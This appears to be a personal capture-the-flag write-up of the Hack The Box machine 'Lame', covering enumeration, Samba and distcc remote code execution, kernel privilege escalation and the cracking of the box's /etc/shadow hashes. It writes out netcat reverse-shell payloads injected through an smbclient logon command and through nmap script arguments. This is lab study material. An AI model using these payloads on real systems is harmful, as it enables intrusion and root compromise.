Linux Boxes

Lame

  1. nmap
    1. all ports
  2. ftp vsftpd
    1. nmap scripts
  3. samba exploit
    1. root through Metasploit
    2. root without Metasploit
      1. /tmp share
      2. reverse shell
      3. potential problem with smbclient 2020 kali
  4. distccd v1 exploit
    1. nmap script .cmd execution
    2. privilege escalation
      1. /linux-exploit-suggestor-2.pl
      2. dirty cow (failed)
      3. 8572.c (success)
  5. post exploitation password cracking
    1. /etc/shadow
    2. hashes
    3. hashcat
  6. lessons learned

Lame

images/262-1.png
images/262-2.png

nmap

images/263-1.png

all ports

we see from the full port scan there is service named distccd the initial scanned missed.
images/264-1.png

running -sV for enumerate version and
-sC enumerate scripts gives us more info on the service
nmap -p 3632 -sC -sV 10.10.10.3
images/264-2.png

ftp vsftpd

images/269-1.png
a quick google search reveals that vsftpd 2.3.4 is a notorious for a backdoor vulnerability built into it

images/269-2.png

images/269-3.png

nmap scripts

here's a good way to search through nmap's script database to search for potential vulnerabilties for services we've enumerated

ls /usr/share/nmap/scripts/ftp*
where the ‘*’ after ‘ftp’ serves as a wildcard to list all of nmaps vulnerability scans relating to ftp
images/1987-1.png

lets use the ftp-vsftpd-backdoor.nse script to scan Lame's vsftpd 2.3.4 service

nmap --script=/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse -p 21 10.10.10.3
images/1987-2.png


the script reports that the service is not vulnerable to the backdoor we serached, it's a rabbit hole

samba exploit

A quick google on the Samba smbd 3.X service reveals there is a command execution metasploit module we can use to own this box
images/265-1.png



images/265-2.png
images/265-3.png

root through Metasploit

fire up msfconsole, search for exploits named samba and chose “usermap_script” script

images/266-1.png

root without metasploit

according to the CVE description, theres a vulnerability that allows remote command execution from authenticated users (or any share that is not password protected!)
images/1988-1.png

we see we have annoymous access to Lame's smb shares, but lets further enumerate what kind of permissions we have on these shares with smbmap
smbclient -L 10.10.10.3
images/1988-2.png

we see we have read and write permissions to the /tmp share!
smbmap -H 10.10.10.3
images/1988-3.png

/tmp share

we see we can list the files within the /tmp share! but according to cve-2007-2447, these files aren't necessary to execute RCE (remote command execution)

images/473-1.png

reverse shell

A quick google serach on metacharacters

images/472-1.png
images/472-2.png

we'll use a netcat backdoor from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
images/472-3.png

We'll combine a logon command along a nohup command surrounded by metacharacters in order to trick Lame's smb samba service to run a backdoor netcat script back to our attack machine
images/472-4.png
logon "/=`nohup nc -nv 10.10.14.62 4444 -e /bin/bash`"
images/472-5.png

run a netcat listener back on our machine on port 4444 before we run the logon command and we catch the shell as root!
images/472-6.png

potential problem with smbclient 2020 kali

if you are not using smbclient on 2020 kali, there's no need to heed this warning

trying smbclient with our target host results in the following error message:
images/1989-1.png

some googling and there seems to be a thread about it on reddit
images/1989-2.png


images/1989-3.png

the post suggests to add the parametere “client min protocol” and set it to NT1 under the global section
images/1989-4.png

smbclient now works!
images/1989-5.png

distccd v1 exploit

images/1990-1.png

images/1990-2.png

lets search nmap's script engine for it
ls /usr/share/nmap/scripts/distcc*
images/1990-3.png

nmap script .cmd execution

we can add arguments to some of the nmap scripting engine exploits by appending the --script-args <command> to the script

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.62 5555 -e /bin/bash'"
images/1991-1.png

setting up a reverse shell listener, we pop a shell as user daemon!
images/1991-2.png

privilege escalation

since gaining control of the user makis through our exploitation of distcc, we'll have to escalate our privileges to root

lets use uname -a to get the kernel version of the victim target and run it against a linux privilege escalator script
./linux-exploit-suggester-2.pl -k 2.6.32

find the github here:
images/1992-1.png
images/1992-2.png

now we can check the exploit suggestor script against the kernel version of our victim machine, to get the version we can use the uname -a command
images/1992-3.png

/linux-exploit-suggestor-2.pl

/linux-exploit-suggester-2.pl -k 2.6.24
where -k denotes the kernel version and 2.6.24 is the version we extracted through the uname -a command on the victim
images/1993-1.png

images/1993-2.png
images/1993-3.png
images/1993-4.png

dirty cow (failed)

dirty cow is a reliable exploit but failed to priv escalate, but I figure it may be worthwhile to document the process for anyone interested in how to set up the exploit


images/1994-1.png

images/1994-2.png
images/1994-3.png
images/1994-4.png
copy the raw sourcecode over to your attacking machine and name is dirty.c

images/1994-5.png

spin up an http server to serve our victim the exploit with
python -m SimpleHTTPServer <port>
images/1994-6.png
images/1994-7.png


now download the exploit from our owned daemon user

images/1994-8.png

give the file execute permissions with:
chmod -x <executable>
images/1994-9.png

running it should instantly pop a root shell but the box is not vulernable to exploit
images/1994-10.png

for the record, I have tried running dirty as the makis user as well and ran into the same permission denial which means Lame was most likely patched to prevent dirty cow from working

8572.c (success)

images/1995-1.png
images/1995-2.png

copy the file with searchsploit -m linux/local/8572.c
images/1995-3.png

spin up a http server and download 8572.c to our victim machine
images/1995-4.png

images/1995-5.png

as the exploit usage states, the udevd process ID can be found in the /proc/net/netlink file
images/1995-6.png

running the exploit with the correct udevd PID returns this error:
images/1995-7.png

we'll need to write a run script that our exploit will run as root to pop a root reverse shell on our attack machine
we'll use echo to write the same pen-test monkey netcat reverse shell back to us
images/1995-8.png


images/1995-9.png

start a listener on the port you specified in your run script and spawn a root shell!
images/1995-10.png

post exploitation password cracking

testing out hashcat for fun on Lame's passwords to see if we can crack them

/etc/shadow


root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::

hashes

$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0
$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0
$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.
$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/
$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.

hashcat

images/272-1.png
images/272-2.png

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1950-1.png